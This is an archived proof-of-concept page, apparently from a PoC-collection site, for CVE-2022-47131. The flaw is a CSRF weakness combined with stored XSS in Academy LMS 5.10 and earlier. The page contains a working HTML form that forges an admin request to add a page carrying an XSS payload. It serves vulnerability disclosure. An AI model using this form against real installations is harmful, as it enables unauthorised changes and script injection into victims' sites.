Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2022-47131 PoC — Academy Learning Management System 跨站脚本漏洞

Source
Associated Vulnerability
Title:Academy Learning Management System 跨站脚本漏洞 (CVE-2022-47131)
Description:Academy Learning Management System是Creativeitem团队的一个学院学习管理系统。 Academy Learning Management System v5.10之前版本存在安全漏洞,攻击者利用该漏洞可以创建任意页面。
Description
Academy LMS <= 5.10 CSRF / XSS
Readme
# CVE-2022-47131
Academy LMS &lt;= 5.10 CSRF / XSS

# Description
Academy LMS is an application where people can create and advertise courses. The feature of adding a new page is vulnerable to CSRF as there is no token which causes this attack to be avoided. Additionally, this page may be used to load an XSS payload stored.

# Proof of Concept (POC)
The first step to our proof of concept is to authenticate to the platform with administrative user.

After that, just access the page that contains the code for exploiting the vulnerability, see that A new button will be added to the website's home page, redirecting to xss page.

Code used in the exploit:

```html
<html>
   <body>
   <script>history.pushState('', '', '/')</script>
     <form action="https://target.com/admin/custom_page/add" method="POST">
       <input type="hidden" name="page&#95;title" value="CSRF&#32;XSS" />
       <input type="hidden" name="page&#95;content" value="&quot;&gt;&lt;svg&#32;onload&#61;alert&#40;document&#46;domain&#41;&#59;&gt ;" />
       <input type="hidden" name="files" value="" />
       <input type="hidden" name="button&#95;title" value="CSRF&#32;XSS" />
       <input type="hidden" name="button&#95;position" value="header" />
       <input type="hidden" name="page&#95;url" value="xss" />
       <input type="submit" value="Submit request" />
     </form>
   </body>
</html>
```
File Snapshot

[4.0K] /data/pocs/ef8d66ad9fa1c7134d05fd183e01dbee8702652a └── [1.3K] README.md 0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.